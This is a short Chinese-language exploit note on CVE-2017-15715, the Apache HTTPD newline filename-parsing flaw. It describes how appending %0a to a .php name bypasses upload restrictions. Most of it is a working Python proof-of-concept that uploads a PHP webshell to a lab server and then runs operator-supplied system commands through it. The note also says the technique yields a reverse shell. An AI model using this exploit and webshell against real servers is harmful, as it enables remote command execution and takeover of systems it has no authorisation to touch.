CVE-2017-15715 Apache HTTPD 解析漏洞

1.描述

• Apache HTTPD 2.4.0~2.4.29
• 一个解析漏洞

2.原理

• 在解析PHP时，1.php\x0A将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略
• 换行符%0a绕过文件上传

3.poc

• poc.py
  • import requests
    ​
    url = “http://192.168.76.138:8080/”
    name = str(input(“Please input upload filename:”))
    hearders = {
       “Content-Type”: “multipart/form-data; boundary=—————————281340862315800489963965371984”
    }
    ​
    data=”’
    —————————–281340862315800489963965371984
    Content-Disposition: form-data; name=”file”; filename=”54321.php.jpg”
    Content-Type: application/x-shellscript
    ​
    <?php @system($_GET[“cmd”]);?>
    —————————–281340862315800489963965371984
    Content-Disposition: form-data; name=”name”
    ​
    {}.php
    ​
    —————————–281340862315800489963965371984–
    ”’
    ​
    res_post = requests.post(url=url,headers=hearders,data=data.format(name))
    res_post_status = int(res_post.status_code)
    ​
    if res_post_status == 200:
       u = “http://192.168.76.138:8080/{}.php%0a?cmd={}”
       cmd = str(input(“Please input CMD:”))
       res_get = requests.get(url=u.format(name,cmd))
       res_get_status = int(res_get.status_code)
       if res_get_status == 200:
           print(“Apache parse vul is exist!”)
           print(“[+] {}”.format(cmd))
           print(“[+] {}”.format(res_get.text))
       else:
           print(“Apache parse vul is not exist!”)

4.exp

• 上传成功可以执行系统命令
• 可以获得反弹shell